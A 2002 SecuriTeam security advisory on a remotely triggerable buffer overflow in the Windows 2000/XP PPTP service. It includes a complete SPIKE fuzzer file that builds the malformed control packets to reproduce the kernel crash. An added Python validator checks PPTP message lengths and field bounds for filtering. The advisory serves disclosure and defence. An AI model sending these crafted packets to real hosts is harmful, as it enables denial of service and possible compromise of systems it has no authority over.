[NT] Microsoft PPTP Server and Client Remote Vulnerability

From: support@securiteam.com
To: list@securiteam.com
Date: Mon, 30 Sep 2002 10:48:59 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Microsoft PPTP Server and Client Remote Vulnerability
------------------------------------------------------------------------

SUMMARY

The Microsoft PPTP Service shipping with Windows 2000 and XP contains a
remotely exploitable pre-authentication buffer overflow.

DETAILS

Vulnerable systems:
 * Microsoft Windows 2000 and XP running either a PPTP Server or Client.

Impact:
With a specially crafted PPTP packet, it is possible to overwrite kernel
memory.

A DoS resulting in a lockup of the machine has been verified on Windows
2000 SP3 and Windows XP.

A remote compromise should be possible by deploying proper shellcode, as we
were able to fill EDI and EDX with our data.

Clients are vulnerable too, because the Service always listens on port
1723 on every interface of the machine. This may be of special concern to
DSL users who use PPTP to connect to their modem.

Solution:
As a temporary workaround for the client issue, one might block the PPTP
port (TCP 1723) in the Internet Connection Firewall on Windows XP.

We do not know of any solution for Windows 2000 and Windows XP PPTP
servers.

The vendor has been informed.

SPIKE:
The following SPIKE file will allow you to replicate this issue:

//start control request
s_block_start("PPTP");
s_binary_block_size_halfword_bigendian("PPTP");
//message type 1 - control request
s_int_variable(0x0001,5);
//cookie
s_binary("1a 2b 3c 4d");
//type 1 - start control request
//5 is big endian halfword
s_int_variable(0x0001,5);
//reserved
s_binary("0000");
//version 1.0
s_int_variable(0x0100,5);
//reserved
s_binary("0000");
//Framing: Ethernet
s_binary("00000003");
//Bearer: Digital
s_binary("00000002");
//maximum channels
s_binary("ffff");
//firmware revision
s_int_variable(0x0001,5);

//hostname
s_string_variable("A");
s_binary_repeat("00",63);

//vendor
s_string_variable("A");
s_binary_repeat("00",63);

s_block_end("PPTP");

///
/// NEXT PACKET
///
///

//start outgoing call request
s_block_start("PPTP2");
s_binary_block_size_halfword_bigendian("PPTP2");
//message type 1 - control request
s_int_variable(0x0001,5);

//cookie
s_binary("1a 2b 3c 4d");
//type 1 - outgoing call request
//5 is big endian halfword
s_int_variable(0x0007,5);
//reserved
s_binary("0000");

//call id
s_binary("0000");

//serial number
s_binary("0000");

//min bps
s_binary("00000960");
//max bps
s_binary("00989680");
//bearer capabilities
s_binary("00000002");
//framing
s_binary("00000003");
//receive window size
s_binary("0003");
//processing delay
s_binary("0000");

s_binary_block_size_halfword_bigendian("PHONENUMBER");
//reserved
s_binary("0000");
s_block_start("PHONENUMBER");
s_string_variable("");
s_block_end("PHONENUMBER");
//subaddress
s_string_variable("");
s_block_end("PPTP2");
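The SPIKE file above varies exactly the fields a receiver must bound-check: the total message length, the fixed 64-byte Host Name / Vendor fields of the Start-Control-Connection-Request, and the Phone Number Length field of the Outgoing-Call-Request. The following Python checker is an added example written for this page; it is not code from the advisory, from phion, Immunity or SPIKE. It parses a PPTP control message using the field offsets from RFC 2637 (assumed from the standard, not from the advisory) and reports each way a message departs from the fixed layout, which is the kind of check an inline filter or IDS rule can apply to TCP port 1723 traffic. The two builder functions construct sample packets with the same field values as the SPIKE file so the checker can be run offline; the sample hostnames and phone numbers are constructed test data.

```python
import struct

# Constants from RFC 2637 (PPTP).
PPTP_MAGIC_COOKIE = 0x1A2B3C4D
PPTP_MSG_CONTROL = 1                # PPTP Message Type: control message
CTRL_START_CONN_REQUEST = 1         # Start-Control-Connection-Request
CTRL_OUTGOING_CALL_REQUEST = 7      # Outgoing-Call-Request
# Both messages are fixed-size on the wire; every string field is 64 bytes.
EXPECTED_LENGTH = {CTRL_START_CONN_REQUEST: 156, CTRL_OUTGOING_CALL_REQUEST: 168}
STRING_FIELD = 64


def validate_pptp_control(pkt: bytes) -> list:
    """Check one PPTP control message and return a list of findings.

    An empty list means the message passed every check applied here. The
    checks cover what the SPIKE file varies: total length, the 64-byte
    Host Name / Vendor fields, and the Phone Number Length field.
    """
    findings = []
    if len(pkt) < 12:
        return ["truncated: control header needs 12 bytes, got %d" % len(pkt)]
    length, msg_type, cookie, ctrl_type = struct.unpack("!HHIH", pkt[:10])
    if cookie != PPTP_MAGIC_COOKIE:
        findings.append("bad magic cookie 0x%08x" % cookie)
    if msg_type != PPTP_MSG_CONTROL:
        findings.append("unexpected PPTP message type %d" % msg_type)
    if length != len(pkt):
        findings.append("length field %d != actual size %d" % (length, len(pkt)))
    expected = EXPECTED_LENGTH.get(ctrl_type)
    if expected is None:
        findings.append("control message type %d not covered by this checker" % ctrl_type)
        return findings
    if length != expected:
        findings.append("type %d must be %d bytes, length field says %d"
                        % (ctrl_type, expected, length))
    if ctrl_type == CTRL_START_CONN_REQUEST and len(pkt) >= 156:
        # Host Name at offset 28, Vendor String at offset 92, 64 bytes each.
        for name, off in (("host name", 28), ("vendor", 92)):
            if b"\x00" not in pkt[off:off + STRING_FIELD]:
                findings.append("%s field not NUL-terminated within %d bytes"
                                % (name, STRING_FIELD))
    if ctrl_type == CTRL_OUTGOING_CALL_REQUEST and len(pkt) >= 40:
        # Phone Number Length at offset 36 describes a 64-byte field.
        phone_len = struct.unpack("!H", pkt[36:38])[0]
        if phone_len > STRING_FIELD:
            findings.append("phone number length %d exceeds %d-byte field"
                            % (phone_len, STRING_FIELD))
    return findings


def build_sccrq(hostname: bytes, vendor: bytes) -> bytes:
    """Constructed Start-Control-Connection-Request using the field values
    from the SPIKE file. Strings are NUL-padded up to 64 bytes but never
    truncated, so an overlong value yields an oversized message."""
    body = struct.pack("!HIHHHHIIHH",
                       PPTP_MSG_CONTROL, PPTP_MAGIC_COOKIE,
                       CTRL_START_CONN_REQUEST, 0,   # control type, reserved0
                       0x0100, 0,                     # version 1.0, reserved1
                       3, 2,                          # framing, bearer
                       0xFFFF, 1)                     # max channels, firmware
    body += hostname.ljust(STRING_FIELD, b"\x00") + vendor.ljust(STRING_FIELD, b"\x00")
    return struct.pack("!H", 2 + len(body)) + body


def build_ocrq(phone_number: bytes, subaddress: bytes = b"") -> bytes:
    """Constructed Outgoing-Call-Request with the SPIKE file's field values."""
    body = struct.pack("!HIHHHHIIIIHHHH",
                       PPTP_MSG_CONTROL, PPTP_MAGIC_COOKIE,
                       CTRL_OUTGOING_CALL_REQUEST, 0,  # control type, reserved0
                       0, 0,                           # call id, serial number
                       0x960, 0x989680,                # min / max bps
                       2, 3,                           # bearer, framing
                       3, 0,                           # recv window, delay
                       len(phone_number), 0)           # phone len, reserved1
    body += phone_number.ljust(STRING_FIELD, b"\x00") + subaddress.ljust(STRING_FIELD, b"\x00")
    return struct.pack("!H", 2 + len(body)) + body


if __name__ == "__main__":
    for label, pkt in (("well-formed SCCRQ", build_sccrq(b"A", b"A")),
                       ("oversized hostname", build_sccrq(b"A" * 100, b"A")),
                       ("well-formed OCRQ", build_ocrq(b"5551234")),
                       ("oversized phone number", build_ocrq(b"9" * 200))):
        print(label, len(pkt), "bytes ->", validate_pptp_control(pkt) or "ok")
```

Because both request types are fixed-size, a receiver that refuses any message whose length field disagrees with the size defined for its control message type never has to copy a variable-length Host Name, Vendor or Phone Number at all; that single length check is the cheapest place to stop the malformed messages the fuzzer generates. Anything that reaches the port from an untrusted network should in any case be blocked at the host firewall, as the Solution section suggests.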

ADDITIONAL INFORMATION

The original advisory is accessible at:
http://www.phion.com/adv/index.html

The information has been provided by Stephan Hoffmann, Thomas
Unterleitner, and Dave Aitel <dave@immunitysec.com>.


DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.